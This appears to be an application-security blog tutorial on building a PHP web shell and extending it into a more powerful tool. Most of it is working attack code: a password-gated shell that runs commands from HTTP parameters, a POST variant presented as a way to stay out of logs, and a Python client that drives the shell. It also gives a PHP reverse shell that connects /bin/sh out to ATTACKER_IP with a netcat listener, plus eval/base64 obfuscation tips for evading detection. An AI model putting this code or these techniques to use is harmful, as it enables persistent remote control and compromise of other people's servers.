Thilan Dissanayaka Application Security Apr 27

Building and Extending a PHP Web Shell

A web shell is a script that enables an attacker to gain remote control over a web server.
It is especially useful for post-exploitation tasks, allowing an attacker to execute arbitrary commands remotely.

Web shells exist in many forms — some are designed for PHP environments, others for ASP.NET, JSP, and more.
Additionally, web shells can be classified based on their connection type:

  • Reverse connection (attacker's machine listens).
  • Bind connection (victim's machine listens).

One of the most popular examples is the C99 PHP Shell.
In this article, we will build a basic PHP web shell and gradually extend it into a more advanced and powerful tool.


Why Use a Web Shell?

  • Post-exploitation: execute system commands remotely.
  • Privilege escalation: interact with the system for further attacks.
  • Pivoting: move deeper into a network.
  • Persistence: maintain access to a compromised server.

Building a Basic PHP Web Shell

Let's start by creating a simple PHP web shell that accepts commands through HTTP GET requests.

<?php
define('PASSWORD', 'f8b60df48fae35dfa126a1b6ccc3ceed'); // MD5 of "hacksland"

function auth($password) {
    $input_password_hash = md5($password);
    return strcmp(PASSWORD, $input_password_hash) === 0;
}

if (isset($_GET['cmd']) && !empty($_GET['cmd']) && isset($_GET['password'])) {
    if (auth($_GET['password'])) {
        echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>';
    } else {
        die('Access denied!');
    }
}
?>
  • PASSWORD is stored as an MD5 hash.
  • We check for cmd and password in the URL query parameters.
  • If authentication passes, we execute the command and return the output.

Usage Example

You can interact with the shell using your browser:

http://127.0.0.1/shell.php?password=hacksland&cmd=ls

Improving the Shell

Let's make the shell more flexible and stealthy.

1. Switch to system() instead of exec()

system() outputs the command results directly, and may behave better for certain command types.

system($_GET['cmd']);

Other alternatives:

  • shell_exec()
  • passthru()
  • popen()

Depending on the server's configuration, one might work better than others.

2. Hidden via POST Request

Instead of using visible GET parameters, switch to POST parameters:

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['cmd']) && isset($_POST['password'])) {
    if (auth($_POST['password'])) {
        echo '<pre>' . shell_exec($_POST['cmd']) . '</pre>';
    } else {
        die('Access denied!');
    }
}

This way, the commands do not show up in server logs easily.


Building a Python Client

Now, instead of using a browser, let’s create a simple Python client to communicate with our web shell.

import requests
from bs4 import BeautifulSoup

target = "http://127.0.0.1/shell.php"
password = "hacksland"

while True:
    cmd = input("$ ")
    try:
        r = requests.get(target, params={'cmd': cmd, 'password': password})
        soup = BeautifulSoup(r.text, 'html.parser')
        print(soup.pre.text)
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        break

This client sends the cmd and password parameters to the server and prints the command output neatly.


Advanced Web Shell Techniques

Let's now extend our basic web shell into something more powerful.


1. Reverse Shell in PHP

Instead of executing a single command, we can spawn a full interactive reverse shell back to our machine.

<?php
set_time_limit(0);
$ip = 'ATTACKER_IP';  // Change this
$port = 4444;         // Change this
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
?>
  • Replace ATTACKER_IP with your IP address.
  • Listen with nc -lvnp 4444 from your machine.

Warning: Some servers disable fsockopen() or proc_open() functions.


2. Obfuscate the Shell

To evade simple detection:

  • Use non-standard variable names.
  • Encode the PHP code (e.g., Base64-encode it).
  • Randomize the password hash.

Example (Base64):

<?php eval(base64_decode('ZWNobyAiSGFja2VkIEJ5IExpZ2h0IExpZ2h0IiA7')); ?>
ALSO READ
Application Security - Interview preparation guide
May 27 Interview Guides

# 1. What is application security? Application security refers to the measures and practices implemented to protect applications from security threats throughout their development lifecycle and....

CSRF - Cross Site Request Forgery
May 27 Application Security

Cross-Site Request Forgery (CSRF) is a web security vulnerability that allows an attacker to induce users to perform actions that they do not intend to perform. It occurs when a malicious website,....

Kafka - Interview preparation guide
Jan 28 Interview Guides

## What is Apache Kafka? Apache Kafka is a distributed event streaming platform designed for high-throughput, fault-tolerant, and real-time data streaming. It is used for building real-time data....

ACID Properties in Databases: The Key to Reliable Transactions
Apr 25 Database Systems

When working with databases, one thing is absolutely critical: keeping your data safe, consistent, and reliable. That's where ACID properties come in — a set of principles that ensure every....

XSS - The Ultimate guide for Cross Site Scripting
May 27 Application Security

Cross-Site Scripting (XSS) is one of the most prevalent and dangerous web application security vulnerabilities. According to OWASP, XSS consistently ranks among the top 10 web application security....

Database Indexing: Speeding Up Your Queries Like a Pro
Apr 26 Database Systems

In the world of databases, speed matters. Whether you're powering an e-commerce store, a social media app, or a business dashboard — users expect data to load instantly. That’s where database....